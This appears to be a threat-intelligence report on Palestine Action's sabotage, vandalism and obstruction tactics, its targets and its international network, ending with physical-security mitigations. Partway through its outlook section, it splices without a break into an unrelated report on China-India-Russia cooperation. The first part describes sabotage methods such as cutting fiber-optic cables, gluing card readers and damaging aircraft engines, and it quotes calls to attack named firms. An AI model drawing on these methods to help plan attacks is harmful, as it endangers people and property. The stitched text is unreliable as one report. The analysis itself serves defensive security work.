These vandalism methods are each attested to in Palestine Action’s official instructional guide as effective ways to “destrupt [sic], damage or destroy your target.” The manual also recommends that DVEs use the same vandalism TTPs to damage exterior surveillance systems in order to avoid detection during direct actions, or to destroy infrastructure such as air conditioning systems or pipes outside the facility to “sabotage the profits of your target even further.”

Figure 3: Evidence of vandalism TTPs from a February 2025 Palestine Action attack against an Allianz insurance office in Milton Keynes, UK (Source: Palestine Action)

Obstruction

Palestine Action operations have also used physical obstruction as a TTP to prevent access to targeted facilities. Unlike other attack TTPs associated with Palestine Action, the group has often used methods of obstructing facilities that are very unlikely intended to maintain the covert nature of the operation. Specifically, in some operations, Palestine Action cells have physically obstructed access to targeted facilities by forming a human blockade: sitting down, interlocking arms, blocking access to a main doorway, and on occasion chaining themselves together or to an immovable object (such as a vehicle or post). In a break from the patterns of other observed Palestine Action TTPs, activists have attempted blockades during normal business hours, mainly to prevent facility employees from entering the premises.

Figure 4: Palestine Action activists blockade a Lockheed Martin facility in Bedfordshire, UK, in a November 2023 protest (Source: BBC)

Palestine Action network groups — particularly in the United States (US) — have also experimented with more novel methods of facility obstruction that can be covertly conducted. Cells with a nexus to the US-based Palestine Action offshoot Unity of Fields (UoF), for instance, launched a campaign in the summer and fall of 2024 to target Citibank automated teller machine (ATM) locations in the New York and Los Angeles metropolitan areas due to the bank’s perceived support of Israeli interests. In addition to vandalizing the facilities, the cells inserted epoxy and affixed cement-glue stickers to exterior card-reader devices that were necessary to enter the facilities. Palestine Action’s instructional guide also calls for activists to use concrete to plug water or sewage pipes leading to targeted facilities, although Insikt Group has not observed Palestine Action operatives using this TTP.

Figure 5: Activists insert epoxy into a Citibank card reader in New York City on October 7, 2024 (Source: Unity of Fields)

Sabotage

Sabotage operations remain the most likely of the TTPs historically employed by Palestine Action to impose serious financial costs on the victims of its operations. While almost certainly relying on low-tech and low-sophistication methods, Palestine Action has caused millions of dollars in damages through sabotage operations, mainly to technology and other assets inside targeted facilities. In previous incidents, cells linked to Palestine Action have relied on the same toolkit used for vandalism and obstruction — large, blunt objects like crowbars and wrenches and fire extinguishers filled with paint — to sabotage their target. Activists almost certainly prefer these tools due to their low cost, ease of use, minimal profile, and the inability to trace their purchase; their use across the spectrum of Palestine Action’s TTPs likely suggests that activists are opportunistic, employing the toolkit in sabotage operations as opposed to vandalism or obstruction when they can exploit vulnerabilities in facility security.

The most notable and recent sabotage incident connected to Palestine Action was the aforementioned breach of RAF Brize Norton, the largest RAF base in the UK, on June 20, 2025. A video of this attack posted by the group shows activists approaching Airbus A330s on the base using electric scooters. They damaged the aircraft by spraying red paint through a fire extinguisher directly into the plane’s engines and striking the plane with crowbars. The attack caused approximately £7 million ($9.4 million) in damages to the aircraft, almost certainly due to the impact of the attack on sensitive parts and equipment inside the planes’ engines. The attack on RAF Brize Norton led to the arrest and indictment of five Palestine Action-linked activists and almost certainly prompted the UK terrorism designation of the group, as well as improvements to facility and perimeter security at the RAF base.

Figure 6: Palestine Action activists approach aircraft at RAF Brize Norton on electric scooters (Source: Palestine Action)

Palestine Action activists also deployed sabotage TTPs on several additional operations targeting defense contractors in the UK. In August 2024, a Palestine Action cell in Bristol breached an Elbit warehouse by piloting a van through perimeter fencing, entered the facility, and began sabotaging internal equipment within the facility with sledgehammers, axes, and other blunt instruments. In total, the operation caused over £1 million ($1.3 million) in damages; protesters also allegedly assaulted a security guard and law enforcement officers responding to the incident, prompting JTAC to label the attack as an “act of terrorism.” During a June 1, 2022, incident at a Thales Group facility in Glasgow, Palestine Action activists accessed the roof and entered the facility, destroying parts used for submarines with blunt instruments. In conjunction with the sabotage operation, two protesters glued themselves to the roof, likely attempting to obstruct access to the facility.

Targets

Palestine Action’s primary target in the UK has almost certainly been Elbit: the global defense contractor has been the most frequent victim of its attacks, the group’s propaganda and instructional material list Elbit as the group’s preferred target, and Palestine Action has launched branded campaigns designed specifically to encourage activists to attack Elbit facilities. As secondary targets, the group has conducted notable attacks against other public and private sector defense entities perceived to have some association with the Israeli military, namely the UK’s Ministry of Defence (MoD), Teledyne Technologies, Thales Group, Leonardo, and Rafael Advanced Defense Systems. According to its 2023 announcement and its post-October 7, 2023, activity, the group and its international network consider a range of entities in sectors that reportedly supply goods or services to Elbit or the Israeli military — including banks, financial institutions, insurance agencies, real estate brokers, accounting firms, human resources contractors, and international shipping and logistics companies — as legitimate targets for militant direct action. Direct actions have also targeted other UK government entities, including the UK Foreign and Commonwealth Office, the BBC, and the London Stock Exchange. Palestine Action almost certainly targets these companies with the goal of inflicting maximum financial and reputational damage through its operations, in order to convince companies to cease their business with Elbit or Israeli entities.

As the next section demonstrates, the international expansion of Palestine Action network groups adopting the UK branch’s modus operandi or TTPs has almost certainly broadened the range of secondary and tertiary targets that are likely to be affected by militant direct action campaigns. However, Palestine Action and its global network very likely share a focus on specific sectors — defense contracting, banking, insurance, and international shipping and logistics — that relevant groups and cells are likely to target regardless of their respective area of operations. Moreover, the TTPs Insikt Group associates with Palestine Action’s UK branch have almost certainly been adopted by its international counterparts, very likely due to the influence of Palestine Action’s militant direct action campaigns in the UK, instructional material, and training sessions for activists.

Palestine Action’s Global Network

Palestine Action’s global network consists of groups of activists around the world who share Palestine Action UK’s commitment to disrupting the normal business operations of entities partnered with the State of Israel through militant direct action. Some of these groups refer or have referred to themselves explicitly as “Palestine Action”; have direct relationships to the UK branch through their members, partners, or benefactors; choose identical targets, such as Elbit; or, like Palestine Action UK, are solely motivated by the anti-Israel cause. Others, despite lacking these relationships, have directly appropriated Palestine Action UK’s TTPs, targets, or other aspects of the organization to support their own operations.

We classify groups in Palestine Action’s global network based on which elements they share in common with the UK branch. As depicted in Table 1, our four-part classification labels Palestine Action network groups as either Palestine Action franchises, affiliates, offshoots, or partners, depending on whether they share areas of operation, motivating ideology, TTPs, or targets with the UK branch. These categories are not static and are subject to change over time, particularly as groups founded as Palestine Action franchises outside the UK adapt to the local landscape in their own countries and form their own brand. Table 1 additionally contains examples of each of the four categories of Palestine Action network groups, with the following subsections containing case studies of particularly notable franchise, affiliate, offshoot, and partner groups.

Table 1: Classification of Palestine Action global network groups (Source: Insikt Group)

Franchise: Palestine Action Italia/Palestina Libera (Italy)

Figure 7: Palestine Action Italia logo (Source: Palestine Action Italia)

Palestine Action Italia, more commonly known as Palestina Libera, is Palestine Action’s Italy-based franchise. On its website, the group directly identifies itself as “the Italian branch of the international ‘Palestine Action’ campaign, which in England directly led to the closure of three arms factories involved in the genocide in Gaza.” The group also uses similar branding as the UK branch, employs similar TTPs, and targets the same sectors, focusing largely on defense contractors with facilities in Italy. In particular, Palestina Libera’s direct actions have frequently targeted the Italy-based defense contractor Leonardo at its offices throughout the country, due to its joint ventures with Elbit.

The organization very likely emerged from pro-Palestinian activist factions in Italy that increasingly aligned with Palestine Action’s global network in the wake of the October 7, 2023, attack. While data in the Recorded Future Platform indicates the group’s website was registered on February 4, 2024, a 2008 issue of al-Majdal Magazine — the quarterly publication of the BADIL Resource Center for Palestinian Residency & Refugee Rights — indicates that the same domain was operated by an Italian pro-Palestinian organization, the Comitato di Solidarietà con il Popolo Palestinese, Torino [Committee for Solidarity with the Palestinian People in Turin, Italy]. Screenshots of the domain captured in the Wayback Machine indicate that between October 2010 and the website’s registration in February 2024, the site displayed a message indicating the administrator should “upload [their] website into the public_html directory.” This message almost certainly indicates that an administrator account was active during the interim, but that it had not uploaded any information onto the domain. The group’s active social media accounts were created in November and December 2023, respectively.

Following Palestine Action’s July 5, 2025, designation as a terrorist organization in the UK, Palestine Action Italia has likely become one of the organization’s most prioritized franchises. Palestine Action’s main website currently includes a link to donate to Palestina Libera, hosted on Palestina Libera’s website. This donation section uses the service provider Donorbox to facilitate transactions, with options for donors including sending €15 for “a little bit of paint,” €50 for “smoke bombs in action,” €100 for the “legal expenses fund,” or another amount determined by the donor. Palestina Libera has also very likely increased its operational tempo in the wake of the proscription, citing Palestine Action UK’s designation and the arrests of protesters at rallies in the UK as motivation for new direct actions. For instance:

• On October 3, 2025, Palestina Libera took part in pro-Palestine direct actions across Italy, protesting the Israeli government’s interception of the Global Sumud Flotilla. Activists very likely affiliated with Palestina Libera participated in occupations and blockades of major transportation and logistics infrastructure, including obstructing a runway at Pisa International Airport, occupying several highways in the Tuscany region, and blockading an Amazon Logistics facility in Brandizzo.
• On September 29, 2025, the group claimed to have blockaded a Leonardo facility in the town of Nerviano. In a social media post, it alleged that at least one Leonardo employee working at the facility joined its protest.
• On September 25, 2025, several of the group’s activists chained themselves together outside a Rheinmetall facility in Rome, which they claimed “hindered production” and “made the gate inaccessible for an entire work shift.”

Affiliate: Death to Toll (Australia)

Figure 8: Death to Toll logo (Source: Instagram)

“Death to Toll” is a campaign by anarchist violent extremists (AVEs) in Australia to conduct vandalism, obstruction, and sabotage against the Australian international logistics and shipping company Toll Group (Toll), its parent organization Japan Post Holdings, and defense contractors working with the Australian Defense Force (ADF), due to accusations that Toll and the ADF are partnering with the Israeli military. The group responsible for this campaign is classified as a Palestine Action affiliate, as it almost certainly shares Palestine Action UK’s ideology and uses TTPs promoted by the group, but operates solely in the Melbourne, Australia area and has chosen its own companies to target.

The first attack claimed by this group was a sabotage of a Heat Treatment Australia (HTA) facility on October 14, 2024; the campaign against Toll began with an obstruction of one of the company’s facilities in Melbourne on November 22, 2024. In an August 7, 2025, interview, Death to Toll’s organizers cited Palestine Action’s targeting of UK shipping organizations that partnered with Elbit as an inspiration for their attacks. They also have shared a copy of Palestine Action’s 2023 instructional guide on their website.

In recent months, the Death to Toll group has claimed responsibility for several acts of vandalism, obstruction, and sabotage targeting Toll:

• On October 7, 2025, AVEs claimed responsibility for intercepting a Toll fuel truck in Melbourne by obstructing a road with flaming objects. They subsequently spraypainted the truck with red graffiti.
• On August 31, 2025, AVEs claimed to have attacked a Toll facility in Dandenong South. A video posted to the group’s Instagram account shows activists smashing exterior glass doors of the facility with a blunt object and dousing them with a flammable liquid in a bottle, very likely gasoline.
• On August 11, 2025, AVEs claimed to have vandalized a Toll facility in Truganina, writing graffiti, spraying red paint, and damaging keycard access devices on the exterior of the facility. Toll confirmed the attack in a statement to the press, and Victoria Police indicated they were investigating the incident.

Beyond its website, the Death to Toll campaign operates a social media account and accepts submissions from independent AVEs for claims of responsibility and tips on potentially vulnerable facilities on a Mega file-sharing site and through a Proton Mail email address. The social media pages attributed to the group have frequently used the hashtags #socalledaustralia, #DeathToll, and #TheDeathTollisRising. On the front page of their website, the administrators have posted a call to action against industries in Australia that they perceive to be providing support for the IDF. Specifically, they claim that “all sites and equipment used or owned by Toll Holdings and its parent company, Japan Post, are legitimate targets for anti-genocide action. This includes sabotage, vandalism, blockades, strikes, occupations, and all forms of resistance and disruption. Everything is on the table.”

Offshoot: Unity of Fields (United States)

Figure 9: Unity of Fields logo (Source: Social Media)

Unity of Fields (UoF) describes itself as an “anti-imperialist propaganda front” that reports on the activities of militant pro-Palestinian activists in the US. In this regard, it functions in a similar fashion to AVE “counter-info” outlets, which provide AVEs in a specified geographic area with information pertaining to upcoming protests and demonstrations, claims of responsibility for AVE attacks, guides and instructional material for carrying out attacks, and communiqués from local AVE groups.

UoF was almost certainly founded as a Palestine Action franchise in the US: during its initial years of operation, it used the name “Palestine Action US,” was managed by a cell of activists who almost certainly founded the group with insight from Palestine Action UK members, and devoted itself to attacking Elbit facilities in the US using Palestine Action’s standard TTPs.

From October 7, 2023, to August 2024, Palestine Action US predominantly conducted vandalism, obstruction, and sabotage against Elbit facilities, particularly in Cambridge, Massachusetts, and Merrimack, New Hampshire. Calla Walsh — almost certainly one of Palestine Action US and UoF’s de facto leaders between October 2023 and July 2025 — was arrested and convicted for her role in a November 20, 2023, Palestine Action US attack on an Elbit facility in Merrimack.

In August 2024, following Walsh’s release from prison, Palestine Action US announced its rebranding as “Unity of Fields”, appropriating a concept from the Yemeni Houthi movement. The group subsequently renamed its social media and online messenger accounts, launched a new website dedicated to the group’s communiqués and instructional materials, and claimed the group’s new mission was to establish “a militant propaganda front against the US-NATO-zionist axis of imperialism.” In addition to claims of responsibility for attacks, the website also hosts a repository of instructional and ideological material, as well as publications produced by other AVE groups.

Autonomous pro-Palestinian activists across the US have sent several dozen claims of responsibility to UoF for publication claiming responsibility for operations against an array of targets, including defense contractors (including Magellan Aerospace, Rolls-Royce and MTU America, Lockheed Martin, Ghost Robotics Corporation, Leidos, and Israel Chemicals), banks (including Bank of America, Citibank, Wells Fargo, Chase Bank, and BNY Mellon), shipping and logistics companies (including Maersk and Amazon), US military recruitment centers, law enforcement infrastructure (particularly vehicles), university buildings and officials, public transportation, and construction buildings and equipment. Occasionally, DVEs from outside of the US — including other Palestine Action global network groups — send communiqués to UoF for publication. At the time of writing, the most recent claims of responsibility include:

• An August 7, 2025, communiqué claiming responsibility for an arson of several vehicles at a Lovitt Technologies plant in Melbourne, Australia
• A May 29, 2025, communiqué claiming responsibility for spraypainting several pro-Palestinian messages on a Maersk shipping container in Oakland, California
• A May 9, 2025, communiqué from protesters at the University of Washington that details the occupation of a university building

UoF has significantly decreased its output of new claims of responsibility since late July 2025, very likely because of internal disputes and a leadership transition within the group. On July 29, 2025, Calla Walsh reported on social media that she was “no longer part of” UoF after a dispute over the “direction in which the project is going,” following which Walsh reported “the organization purged me” and that she had “complied with the decision and transferred them ownership of the accounts.” While Insikt Group is unaware of the exact nature of this dispute, Walsh’s departure from UoF directly followed a July 2025 trip she made to Iran, where she participated in an event hosted by the World Service of the Islamic Republic of Iran Broadcasting (IRIB), Iran’s government-operated media agency. In an October 5, 2025, article on her Substack page, Walsh reported that she had been detained by US Customs and Border Protection (CBP) officers at New York’s John F. Kennedy International Airport following her return from Tehran.

Partner: Shut the System (United Kingdom)

Figure 10: Shut the System logo (Source: Social Media)

Unlike other groups included in this report, which are predominantly motivated by the Palestinian cause, Shut the System is a UK-based environmental violent extremist (EVE) group that likely emerged as an offshoot of the UK climate activist group Extinction Rebellion (XR). However, the group has also almost certainly conducted pro-Palestinian direct actions. In addition, Shut the System has also directly collaborated with Palestine Action in the UK, almost certainly due to substantial overlaps between Palestine Action’s and Shut the System’s TTPs, preferred targets, and areas of operation. For instance, Shut the System frequently targets insurers and banks that it claims provide services to major global fossil fuel extraction projects; Palestine Action has also targeted many of the same companies on the grounds that they provide services to the IDF or Israeli government. Both groups also frequently use vandalism with red paint, projectiles, or blunt objects to deface the facade of target properties, as well as sabotage, although Shut the System has very likely deployed more sophisticated methods of infrastructure sabotage than Palestine Action. Overall, Shut the System fits the profile of a Palestine Action partner organization.

The first reported Shut the System operation took place in late February 2024. During 2024, the group predominantly conducted vandalism targeting the London offices of insurance companies, such as AIG, Probitas 1492, Chubb, Liberty General, Lloyd’s of London, Markel UK, QBE, Tokio Marine, as well as Barclays, using red paint, graffiti, and projectiles. In a January 2025 communiqué, Shut the System claims to have selected these companies as targets because they were identified in a November 2023 article from Insurance Business Magazine as among the top ten insurers of fossil fuel extraction projects in the world. On June 10, 2024, Shut the System and Palestine Action conducted a joint, UK-wide operation targeting Barclays bank branches in Birmingham, Bristol, Brighton, Edinburgh, Exeter, Glasgow, Lancashire, London, Manchester, Northampton, Sheffield, and Solihull. Activists from both groups sprayed red paint on the exterior of the branch facilities and smashed their windows with projectiles.

Subsequently, the group has very likely expanded its targeting aperture to include conservative think tanks, additional financial services providers, and events for defense contractors, posting claims of responsibility for attacks on its websites and social media profiles. Shut the System’s website also contains instructions on how to conduct vandalism, obstruction, and sabotage on behalf of the group, and provides a list of 38 banks and insurance companies that it identifies as priority targets due to their alleged financing of the fossil fuel industry. The group continues to conduct joint operations with a number of UK-based AVE and EVE cells, including cells affiliated with almost certain Palestine Action offshoot groups. For instance, during the past several months, Shut the System claims to have collaborated with pro-Palestinian militant direct action groups during the following operations:

• On October 8, 2025, Shut the System’s “Palestine solidarity faction” and activists from the UK group Palestine Pulse claimed to have used projectiles and blunt instruments to destroy “entrances, glass panels, security cameras and ID card readers” at a Palantir Technologies facility in London. They additionally claimed to have sprayed red paint on the building’s facade.
• On September 29, 2025, Shut the System claimed to have conducted a joint operation with Shut Elbit Down and French and German XR affiliate groups to target Barclays and BlackRock assets throughout the UK and Europe. Activists sprayed red paint outside of Barclays offices in Paris, France, and Hamburg, Germany, and a BlackRock office in Vienna, Austria, and “superglued locks of [Barclays] branches across the UK.” Additionally, Shut the System stated it targeted two Barclays senior executives in the UK by spraying red paint outside of their personal residences, and sending letters to the executives’ neighbors “inviting them to a cocktail party hosted by the [executive] where they can explain why they have no conscience.”
• On September 8, 2025, Shut the System claimed to have severed fiber-optic cables leading to the London offices of Clarion Events, the company responsible for hosting the Defence and Security Equipment International (DSEI) defense trade exhibition. It conducted the action as part of a campaign, “Shut DSEI Down,” that aimed to protest the trade exhibition due to the participation of several defense contractors that pro-Palestinian activists argue provide armaments to the IDF.

From January 2025 onward, Shut the System frequently used a physical attack TTP that we have not observed in the operations of other Palestine Action global network groups, namely, sabotaging communications infrastructure by cutting fiber optics lines. Instructions on Shut the System’s website demonstrate how to identify fiber optic cable boxes outside of target facilities, locate the correct wires, and sever them to disrupt internet and other communications services to the building. Between August 18 and September 31, 2025, Shut the System launched a campaign titled “Summer of Sabotage” in which it encourages activists to use these and other sabotage TTPs to target banks and financial industry entities.

Mitigations

The decentralized nature of individual Palestine Action cells entails that activists very likely plan operations in closed or encrypted communications channels that are almost certainly inaccessible to individuals who have not established their bona fides with the group. The groups’ official communications announce operations after the fact; they almost certainly will not provide indicators and warnings (I&W) of planned activities.

To diminish risks from physical threat activities conducted by Palestine Action’s global network, organizations and their physical security teams should focus on mitigating the effects of attacks by implementing the following approaches. Overall, physical security measures should aim to deny Palestine Action operatives interior access to facilities. The most costly attacks perpetrated by the group — including the June 2025 attack on RAF Brize Norton — took place after activists were able to breach secure perimeters, enter facilities, and sabotage assets stored inside perimeters.

• Recorded Future customers can leverage the Recorded Future Intelligence Operations Platform to monitor communications sources connected to Palestine Action and its global network, in order to determine evolutions in trends in targeting and TTPs and an organization’s overall risk level.
• Customers can use the Recorded Future Platform’s Intelligence Cards, Advanced Query Builder, and Insikt Group reporting to track ongoing global events — such as the Israel-Hamas conflict or the status of Palestine Action’s legal battle against its terrorism designation in the UK — that are likely to affect threat actors’ operational tempo and targeting aperture.
• Integrate this report and other Insikt Group assessments of DVE threat actors’ TTP and targeting into structured tabletop exercises for physical security teams.
• Review and, where necessary, implement governmental guidelines for physical protection of business facilities, particularly with regard to electronic surveillance, secure lighting, and security personnel.
• Conduct vulnerability assessments to enable effective contingency and resiliency planning in the event of an incident of vandalism, obstruction, or sabotage, with particular focus on a successful incident disrupting communications, transportation, and energy infrastructure.
• Limit voluntary publication of information about the functions, layout, and location of critical infrastructure assets at facilities, or security measures at a facility, beyond the levels necessary to comply with legal or regulatory requirements.

Outlook

While Palestine Action’s branch in the UK continues the ongoing legal appeal of its terrorism designation — very likely until the designation is rescinded or all of its legal options are exhausted — Palestine Action’s global network is very likely to escalate the frequency and scope of its militant direct action operations. In the short to medium term, the formation of new Palestine Action global network groups in North America, Western Europe, Australia, and elsewhere around the world is likely, threatening an increased range of organizations in defense contracting, banking, finance, insurance, and shipping and logistics sectors.

Extant groups linked to Palestine Action are also likely to traverse the various categories of groups described in this report, with cells inside the UK attempting to separate themselves from the Palestine Action brand to avoid legal scrutiny and cells outside the UK highlighting their connections to Palestine Action to build credibility with AVEs and the pro-Palestine activist movement. As such, we expect existing franchises and affiliates in the UK to increasingly become offshoots and partners while the ban is in effect; the reverse is likely in geographic areas outside the UK where Palestine Action is not a designated terrorist organization.

Volatile dynamics in the Israel-Hamas conflict and the situation in the Gaza Strip are also very likely to influence Palestine Action’s global network in the short to medium term, especially with regard to the frequency of attacks. At the time of writing, a ceasefire between Israel and Hamas, effective October 10, 2025, remains in effect. While the establishment of the ceasefire likely did not stop Palestine Action network groups from conducting operations — several of the groups profiled in this report have carried out attacks in the interim — any potential breakdown in the ceasefire would very likely augur increased Israeli military activity in the Gaza Strip that has historically caused upticks in attacks related to the network.

Insikt Group assesses that the August 2025 meeting of Chinese Communist Party (CCP) General Secretary Xi Jinping, Indian Prime Minister Narendra Modi, and Russian President Vladimir Putin at the Shanghai Cooperation Organization (SCO) Summit likely suggests early interest among the three states to explore trilateral cooperation, though the formation of a resilient bloc remains unlikely.

United States (US) policy –– particularly the level of sanctions the US places on each country –– is likely one of the primary factors driving the three states to change their level of cooperation. An increase in US sanctions is likely to drive each state to pursue alternative markets; this motivation has led to an acceleration of trilateral cooperation in some areas, and a reduction in others. For example, President Donald Trump’s decision to impose tariffs on India in mid-2025 very likely amplified a warming China-India relationship and reinforced a stable India-Russia relationship. In contrast, US sanctions on Russian oil companies in October 2025 led China and India to decrease their level of Russian oil imports.

The second factor driving Russia, India, and China to explore trilateral cooperation is very likely their shared strategic interest in a multipolar global order — manifest through fora like SCO and BRICS (Brazil, Russia, India, China, and South Africa).

However, despite nascent trilateral cooperation, there remains significant divergence among the three countries’ foreign policy goals, governing principles, and economic ambitions, which likely limits the scope of their cooperation. The political, economic, and military dynamics that shape bilateral relationships between China-Russia, China-India, and India-Russia are complex and distinct. Of those relationships, challenges between Beijing and New Delhi are almost certainly the greatest barrier to the formation of a trilateral bloc or alliance. In particular, India’s competition with China for Asia-Pacific regional leadership and influence, a large trade deficit favoring China, and unresolved border disputes will very likely temper the depth of cooperation between the two. All three countries seek to create an alternative center of gravity to the West, but India does not share Russia’s or China’s staunchly anti-Western worldview.

Although BRICS and SCO almost certainly represent viable opportunities for the three countries to foster trilateral cooperation, significant limitations prevent deeper alignment within these fora. The Russia-India-China (RIC) dialogue format, if rejuvenated, would offer the most likely format to formalize trilateral alignment. Insikt Group identified a range of potential indicators that are likely to reflect a coalescence into a political, economic, or military bloc.

Deepening trilateral coordination would almost certainly have broad implications for both the public and private sectors, depending on the depth and intensity of the cooperation. For example, the formation of trilateral economic frameworks, such as lower trade barriers or coordinated regulatory schemes, would force private sector companies operating in any of these countries to adapt to new regulatory standards and potentially face increased competition from an enlarged trilateral economic market. Deeper defense cooperation could lead to shifts in the defense industry of each country, as markets adjust to serve the defense needs of each member of the trilateral. If this leads Chinese and Indian defense industries to increasingly look to serve Russian defense needs, it could force companies that currently produce dual-use technologies for China and India to make adjustments to avoid transacting with sanctioned Russian defense entities.

Key Findings

• The single greatest impediment to trilateral cooperation is very likely the deep distrust between China and India, which underpins political, economic, and military competition — including a decades-long border dispute. India’s doctrine of strategic autonomy and its pursuit of “multi-alignment” are likely to limit its willingness to join a formal trilateral bloc with China and Russia that is explicitly positioned as a counterweight to the West.
• However, all three states very likely share a desire for a multipolar world that includes more developed regional centers of power. This likely helps drive trilateral cooperation to avoid US influence that threatens the strategic interests of Russia, China, and India.
• The nearly decade-long strategic partnership between Moscow and Beijing is likely a key factor driving trilateral cooperation, as Russia and China have shared experience developing alternative centers of power to the West. Both states are likely motivated to convince India to adopt a similar strategy.
• An increase in US sanctions and tariffs is very likely to be a primary factor driving greater trilateral cooperation, as all three states seek alternative markets and China and India likely aim to avoid secondary sanctions. In contrast, Western government policies that facilitate China’s and India’s access to Western markets are likely to lessen Beijing’s and New Delhi’s incentive to deepen trilateral economic cooperation.
• Deepened trilateral economic cooperation very likely would increase the prospect that Western companies — especially those operating in India — see heavier state involvement in the private sector and greater Western scrutiny of Indian economic transactions to catch sanctions violations, as New Delhi aligns its practices with Moscow and Beijing.

Background: US Policy Likely Driving Nascent Cooperation Among China, India, and Russia

We assess that there are early signs of cooperation among India, China, and Russia in recent months and that this cooperation is likely to expand, driven primarily by an emerging thaw in China-India relations. Against the backdrop of strong India-Russia and China-Russia relations, this warming of China-India relations likely increases the prospect of a deeper trilateral relationship. However, a formal China-India-Russia bloc has not yet formed, and significant limitations –– particularly around Beijing-New Delhi tensions –– are likely to challenge such an alignment.

India has likely calculated that the US’s 50% tariff on Indian exports –– imposed on India in August 2025, comprising a 25% reciprocal tariff and a 25% “penalty” tariff due to India purchasing sanctioned Russian oil –– necessitates looking for alternative markets and deepening foreign partnerships to recoup lost revenue and reinforce relationships India likely views as more reliable, including cultivating its relationship with Beijing. On August 6, 2025, one day before the US imposed a 50% tariff on Indian exports to the US, the Indian Ministry of External Affairs called the US’s decision “unfair” and “unjustified” and vowed that India would “take all actions necessary to protect its national interests.” India has specifically highlighted the inconsistency in the US’s application of a penalty tariff on India for importing Russian oil, while other countries, “even those with more adversarial relations with Russia,” have also sourced oil from Russia. China’s increasing oil imports from Russia likely reinforced to New Delhi that the US’s tariff policy was unjust. Indian officials are reportedly monitoring the US Supreme Court case (challenging the Trump administration’s tariffs) to determine its impact on current US-India trade negotiations. A breakthrough in trade talks would likely improve, but not entirely repair, the deteriorating diplomatic and economic ties between India and the US.

The US tariffs have likely also reinforced an emergent reconciliation between India and China. In August 2025, Chinese Foreign Minister Wang Yi visited New Delhi for the first time in three years. Beijing likely sees economic and political benefit to deepening ties with India, including exploiting the Indian market for Chinese exports and curbing US influence in South Asia. China’s trade surplus with India and status as the top exporter of electronics, telecommunications, and machinery to India likely give Beijing economic leverage in negotiations with India, particularly as India looks to recoup revenue lost due to US tariffs.

Following Modi’s August 31, 2025, meeting with Xi –– Modi’s first visit to China in seven years, at the SCO Summit in Tianjin –– Modi stated that “a stable relationship and cooperation” between China and India was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century.” Amid India’s stated frustration over US tariffs, the highly publicized friendly interaction between Modi, Xi, and Putin (Figure 1) at the SCO Summit sparked concerns over an emergent Russia-India-China troika.

Figure 1: Photo posted by Modi of himself with Putin and Xi at the SCO Summit

on August 31, 2025 (Source: Social Media)

The nascent warming of China-India relations likely makes deeper trilateral cooperation among China, India, and Russia more probable, as China and Russia, as well as India and Russia, already have strong relations. Thus, a warming China-India relationship ameliorates the biggest barrier to the formation of a trilateral dynamic. In addition, all three states likely see political and economic benefits to deepening cooperation.

Areas of Bilateral Intersection and Divergence Among China, India, and Russia

Deepening trilateral cooperation among China, India, and Russia likely serves the strategic foreign policy interests of each state, though the trajectory of any fully formed trilateral dynamic is likely to be shaped by nuanced differences among each state’s foreign policy, as well as the bilateral dynamics within this group.

China’s Foreign Policy

China’s foreign policy toward Russia and India is almost certainly an outgrowth of the country’s primary strategic objectives. These include China’s “core interests,” such as preserving the CCP’s political power, territorial integrity, and economic development, as well as China’s efforts to shape a “multipolar” world, which almost certainly entails independence from US coercion, an increase in China’s international influence, and greater global dependence on China. China very likely sees greater cooperation with Russia and India as supporting these goals, especially in relation to Beijing’s main perceived threat — the US. In particular, China almost certainly considers Russia a political, economic, and military partner that helps legitimize China’s narratives about the need for multipolarity and bolster its ability to defend itself from US coercion. China likely considers India an important economic partner and judges that frayed India-US relations diminish the US’s efforts to encircle and contain China.

India’s Foreign Policy

India almost certainly defines its relationships with China and Russia through its doctrine of “strategic autonomy,” in which New Delhi avoids binding security alliances, instead maintaining flexibility in its relationships with global powers while cultivating influence across the developing world. Shaped by its role in founding the Non-Aligned Movement during the Cold War, New Delhi’s engagement with Beijing and Moscow has been a pragmatic balancing act seeking to promote an increasingly multipolar world order while simultaneously fostering ties with the US. India’s approach to China and Russia is also underpinned by a “multi-alignment” policy, which very likely seeks to promote and safeguard India’s core national interests, including economic growth, national security, territorial integrity, regional stability, and global cooperation. Consistent with its strategic independence, New Delhi has cultivated its role as a “neutral centrepiece” between China and the West while avoiding overt alignment with, or opposition to, any particular state.

Russia’s Foreign Policy

Moscow very likely views its relationships with China and India as beneficial to its core foreign policy goal of enhancing Russia’s global influence by replacing what Moscow sees as a US-centric global system with a multipolar world in which Russia is on equal footing with the US and China. This goal has almost certainly driven Moscow to place increased importance on relationships with non-Western powers, including China and India. Russia’s latest Foreign Policy Doctrine describes this goal as follows:

Russia also sees value in expanding economic cooperation with China and India, as Moscow seeks to replace revenue lost due to Western sanctions. The sanctions that the EU and the US have placed on Russia for its annexation of Crimea in 2014 and full-scale invasion of Ukraine in 2022 have made Russia the most sanctioned state in the world.

China-Russia: Strategic Partners in Countering the West

In recent years, China and Russia have become critical strategic partners, with diplomatic, military, economic, and technological engagement deepening. Although tensions almost certainly exist, particularly in their respective intelligence services, close leader relations and convergence on strategic foreign policy objectives –– particularly pushing back against perceived Western hegemony –– means these low-level tensions are unlikely to undermine China and Russia’s overall cooperative trajectory.

Political Dynamics

Chinese and Russian leadership almost certainly see each other as primary strategic partners in advancing the “multipolar” world. In 2023, Xi said to Putin, “We are the ones driving” changes unseen in a century, and multiple joint statements have noted this goal. Moscow likely views China as having the ability to leverage its significant economic and political influence to amplify Russia’s goal of ushering in a multipolar world with Russia, the US, and China on equal footing. Russia is an advocate for, or a participant in, many of China’s global governance and development initiatives that relate to its goals for a “multipolar” world, including the Global Governance Initiative, Global Security Initiative, and Global Development Initiative.

Putin and Xi very likely have a close political relationship, judging from their official statements and the frequency of their visits. Xi and Putin have met over 40 times since 2012 — more frequently than either has met with any other leader. In February 2022, China and Russia declared a “no limits partnership,” and in May 2025, Putin stated that “The comprehensive partnership and strategic cooperation between Russia and China are built on the unshakable principles of equality, mutual support and assistance, as well as the unbreakable friendship between the two states and two nations.” China and Russia’s political alignment has extended to supporting one another at international institutions. For example, they have used their veto powers on the UN Security Council (UNSC) to support one another’s interests, often vetoing resolutions that the other opposes.

